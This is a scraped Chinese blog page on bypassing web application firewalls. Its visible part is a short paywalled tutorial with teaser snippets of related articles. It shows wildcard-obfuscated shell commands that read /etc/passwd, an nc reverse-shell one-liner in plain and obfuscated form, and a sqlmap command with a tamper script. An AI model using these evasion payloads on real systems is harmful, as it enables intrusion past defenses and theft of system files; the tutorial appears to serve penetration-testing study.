漏洞利用之WAF绕过

最新推荐文章于 2025-06-30 15:35:43 发布
原创 最新推荐文章于 2025-06-30 15:35:43 发布 · 1.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#WAF绕过

目录扫描

第一:修改客户端ip

第二:减慢扫描速度

第三:通过代理欺骗waf

命令执行WAF绕过

1.通配符

符号 含义
匹配单个字符如果匹配多个字符,就需要多个?连用
* *代表任意数量的字符
[ ] 代表一定有一个在括号内的字符(非任意字符)。例如 [abcd] 代表一定有一个字符, 可能是 a, b, c, d 这四个任何一个

利用通配符执行以下命令:

ls -l
使用通配符
/?in/?s -l

读取/etc/passwd:
/???/??t /??c/p???w?
有时候WAF不允许使用太多的?号
/?in/cat /?tc/p?sswd

nc反弹shell

nc -e /bin/bash 127.0.0.1 3737
 /??n/?c -e /??n/b??h 127.0.0.1 3737

2.连接符

常见连接符:单双引号反斜杠 " " ‘ ’
例 :读取/etc/passwd


                

                
                
        

    

    
  


        

            

                      
                        最低0.47元/天 解锁文章
                        

                          
200万优质内容无限畅学

                          
                        

                      
            

        


    

      

        

            

              
                
                  Mr  H
                
              
            

            

                关注
              
            

        

        

          
      

      










                



	

		

			

				
					
文件上传之waf绕过 方式方法汇总超详细 持续更新

				
			

			

				

					浩策盾悟
				

				

					02-03
					
					7459
					
				

			

		

		

			
				
部分 WAF 仅检查最后一个扩展名,而服务器可能解析第一个有效扩展名(如 Apache 解析顺序漏洞)。→ Apache 可能解析为 PHP 文件(需配置漏洞)。:Windows 系统特性(如 NTFS 流)、空格截断。:WAF 检测文件开头特征,但服务器忽略注释。:暴力破解扩展名或 Content-Type。:将恶意代码嵌入 GIF 动画的注释或帧中。(PHP 5.3.4 之前版本可能有效)。→ IIS 可能解析为 ASP 文件。:自动化测试文件上传漏洞。(注入恶意元数据)。

			
		

	



                

            
              



	

		

			

				
					
WAF绕过漏洞利用——漏洞利用之注入上传跨站等绕过

				
			

			

				

					m0_61506558的博客
				

				

					10-05
					
					1187
					
				

			

		

		

			
				
这里介绍常见的漏洞利用绕过的方法,方法有很多很多,一定要有自己的思想,就拿逻辑漏洞来说,AWVS、AppScan、Xray、Nessus、Sqlmap......这些自动化工具是扫描不出来的,加密编码绕过?算法可逆?关键字绕过?提交方法?各种测试?要学会尝试自己造轮子,本篇文章引入几种简单方式,希望打开大家思路之前简单总结过,感兴趣的(一)SQL注入。

			
		

	



              


  
              

                


	

		

			

				
					
WAF绕过-漏洞利用之注入上传跨站等绕过

				
			

			

				

					xhscxj的博客
				

				

					02-22
					
					1995
					
				

			

		

		

			
				
waf主要拦截的就是上图漏洞
SQL 注入
如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块
安全狗:参考之前 payload
Aliyun:基本修改指纹即可
宝塔:匹配关键字外加/*等
sqlmap --proxy="http://127.0.0.1:8080" --tamper="waf.py" --random-agent

#文件上传
1.php 截断 参考前面上传 waf 绕过 payload

#XSS 跨站
利用 XSStrike 绕过 加上--tim.

			
		

	





	

		

			

				
					
绕过WAF的常见Web漏洞利用分析

				
			

			

				

					weixin_42478365的博客
				

				

					03-14
					
					238
					
				

			

		

		

			
				
https://mp.weixin.qq.com/s/uRkudYZGvxJsMwkfW-ywiw



			
		

	



		

			
		



	

		

			

				
					
文件上传绕过WAF:雷池、宝塔、安全狗技巧

					
最新发布

				
			

			

				

					wcl20010的博客
				

				

					06-30
					
					1134
					
				

			

		

		

			
				
WAF会检查上传文件的MIME类型(Content-Type)和文件扩展名,判断是否为可执行文件或恶意文件类型。例如,阻止上传.php.jsp.asp等脚本文件。WAF会对上传文件的内容进行深度分析,通过特征码匹配、沙箱分析等方式,检测文件中是否包含恶意代码(如WebShell特征码)。WAF会检查文件名是否包含特殊字符、双扩展名等异常情况,以防止攻击者通过文件名混淆绕过检测。WAF会分析HTTP请求包的结构,特别是部分的和boundary等字段,确保其符合HTTP协议规范,防止畸形请求绕过

			
		

	





	

		

			

				
					
log4j RCE waf 绕过技巧

				
			

			

				

					weixin_50464560的博客
				

				

					07-09
					
					2046
					
				

			

		

		

			
				
log4j waf 绕过技巧 - ph4nt0mer - 博客园 (cnblogs.com)原来的poc:



Copy绕过的poc:



Copy可行



Copy不一定可行



Copy可行unico字符串下列表达式均等价于abc:



Copylog4j poc集合
https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis● 不出现port,避免被waf匹配ip:port



Copy

			
		

	





	

		

			

				
					
WAF绕过-注入上传RCE利用绕过思路

				
			

			

				

					告白的博客
				

				

					08-28
					
					698
					
				

			

		

		

			
				
0x00 简介
当我对对象检测,已经检测到存在sql注入,文件上传或者RCE等漏洞的时候,发现验证漏洞的存在,被waf拦截,无法验证漏洞,这里总结sqlmap的注入绕过,xss工具使用的绕过,文件上传的思路,以及RCE命令执行的命令写法绕过safedog,BT,aliyun
0x01 绕过思路
1)sqlmap绕过思路
cc绕过:
cc绕过:使用代理扫描:--proxy="http://代理IP:端口" 

payload变异绕过思路:
指的是当我们以及确定存在注入,我们尝试去手工注入验证查看回显时候,输入

			
		

	





	

		

			

				
					
RCE绕过技巧大全

				
			

			

				

					渗透测试
				

				

					12-11
					
					1151
					
				

			

		

		

			
				
远程代码执行(RCE)漏洞是一种严重的安全威胁,允许攻击者在受害者的服务器上执行任意命令。在实际渗透测试和攻击过程中,WAF(Web应用防火墙)或漏洞的某些限制可能需要使用各种绕过技巧。以下是常见的 RCE 绕过技术分类和示例。

			
		

	





	

		

			

				
					
SQL 注入之 WAF 绕过

				
			

			

				

					2301_77160226的博客
				

				

					08-28
					
					1650
					
				

			

		

		

			
				
SQL 注入攻击是一种严重的安全威胁,而 WAF 是防范 SQL 注入攻击的重要手段之一。然而,攻击者也在不断寻找方法来绕过 WAF,从而成功实施 SQL 注入攻击。为了防范 WAF 绕过,我们需要采取持续更新 WAF 规则、多层面防御、安全培训和定期安全审计等措施,形成一个强大的安全防护体系,保护 Web 应用程序的安全。同时,我们也需要不断关注网络安全领域的最新动态,及时了解新的攻击技术和防范方法,以提高我们的安全防护能力。

			
		

	





	

		

			

				
					
【ssrf漏洞waf绕过

				
			

			

				

					My笔记的博客
				

				

					04-05
					
					937
					
				

			

		

		

			
				
(1)扫描内部网络利用多线程脚本去fuzz可用的端口或者服务。(2)向内部的任意主机和任意端口发送精心构造的数据包。举个例子(soapclient类+crlf漏洞给内网发送任意数据包利用http攻击redis)(3)wordpress开启xmlrpc利用pingback.ping方法造成ddos漏洞。或者请求大文件,始终保持连接keep-alive always(4)利用协议进行暴力穷举(5)如果不知道一个cms是什么cms,让服务端去访问自己所处内网的一些指纹文件来判断是否存在相应的cms。

			
		

	





	

		

			

				
					
WAF绕过

				
			

			

				

					tell_me_404的博客
				

				

					04-01
					
					404
					
				

			

		

		

			
				
一、WAF绕过原理详解
     了解WAF防护原理

     查看WAF防护位置

     熟悉防护规则

     了解防护机制

     查看拦截时间阀值

下载一个安全狗查看


二、目录扫描绕过WAF
     几种方式:

     1、修改客户端IP

     2、减慢扫描速度

     3、通过代理欺骗WAF

dirbuster扫描

将UA修改为百度爬虫的UA:
Mo...

			
		

	





	

		

			

				
					
WAF绕过的各种方法总结.pdf

				
			

			

				

					07-09
				

			

		

		

			
				
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途

			
		

	





	

		

			

				
					
某教程学习笔记(一):23、WAF绕过

				
			

			

				

					Web安全工具库
				

				

					03-25
					
					514
					
				

			

		

		

			
				
我睡了一下午,醒的时候发现,屋子里黑漆漆的,一点声音都没有,抬头望了望窗户,天还没完全黑,四处摸摸,在枕头下找到手机,打开屏幕,干净,没有一条信息。。。
一、目录扫描绕过WAF
1、dirbuster扫描,默认的UA为:DirBuster-0.12 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)

2、安全狗会拦截...

			
		

	





	

		

			

				
					
数据库udf提权,WAF绕过

				
			

			

				

					qq_42045349的博客
				

				

					10-02
					
					1239
					
				

			

		

		

			
				
数据库udf提权,WAF绕过
1、数据库自带函数的功能与用法
数据库功能函数
udf提权
系统函数




函数名
说明




version()
系统版本


user() ||CURRENT_USER()
数据库用户名


database()
数据库名


@@datadir
数据库路径


@@version_compile_os
操作系统版本


select version() as 系统函数,user() as 数据库用户名,database() as 数据库   名 ,@@datadir 

			
		

	





	

		

			

				
					
WAF绕过方法

				
			

			

				

					weixin_30590285的博客
				

				

					07-19
					
					621
					
				

			

		

		

			
				
1.大小写绕过
这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。
2.简单编码绕过
比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。
也还有大家在Mysql注...

			
		

	





	

		

			

				
					
CTF writeup 1_网络安全实验室

					
热门推荐

				
			

			

				

					Troy
				

				

					10-26
					
					32万+
					
				

			

		

		

			
				
基础关1.key在哪里? 
过关地址打开网址 
“key就在这里中,你能找到他吗? ” 
看看源代码有没有线索~果然<html>
    <head>
        <meta http-equiv="content-type" content="text/html;charset=utf-8">
    </head>
    <body>
    key就在这里中,你能找到他吗?

			
		

	





	

		

			

				
					
BUUCTF笔记之Web系列部分WriteUp(四)

				
			

			

				

					克格莫(有需要的私信)
				

				

					06-24
					
					3万+
					
				

			

		

		

			
				
1.[BJDCTF2020]Mark loves cat
dirb扫描目录发现.git泄露。
githack获取源码

<?php

$flag = file_get_contents('/flag');

//HTML代码太多了,人工删除
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
    $$x = $y;
}
foreach($

			
		

	





	

		

			

				
					
wuyun知识库目录

				
			

			

				

					Grey的博客
				

				

					01-15
					
					1万+
					
				

			

		

		

			
				
1269.利用Office宏及Powershell的针对性攻击样本分析2016-06-24
1268.SQL注入关联分析2016-06-24
1267.Android安全开发之ZIP文件目录遍历2016-06-23
1266.search-guard 在 Elasticsearch 2.3 上的运用2016-06-23
1265.签名加密破除-burp插件在app接口fuzz中的运用201

			
		

	





	

		

			

				
					
WAF绕过小技巧

				
			

			

				

					2401_88752464的博客
				

				

					12-06
					
					1864
					
				

			

		

		

			
				
HTTP头里的Content-Type一般有application/x-www-form-urlencoded,multipart/form-data,text/plain三种,其中multipart/form-data表示数据被编码为一条消息,页上的每个控件对应消息中的一个部分。例如最常见的url编码,对数据进行二次url编码,waf进行一次解码并不能解析到有效的数据,而后端在进行解码时传入的为有效的恶意数据。在 php 语言中 id=1&id=2 后面的值会自动覆盖前面的值,不同的语言有不同的特性。

			
		

	





	

		

			

				
					
绕过WAF:ASP与PHP参数复用漏洞与异常Method利用

				
			

			

				

					
				

			

		

		

			
				
举了一个针对disuczx版本的内置函数_do_query_safe()的绕过例子,攻击者通过巧妙地组合字符串和SQL表达式,利用WAF对SQL注入防护的漏洞,成功绕过了安全检查。  复参数绕过是一种高级的攻击手段,需要对目标环境和...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值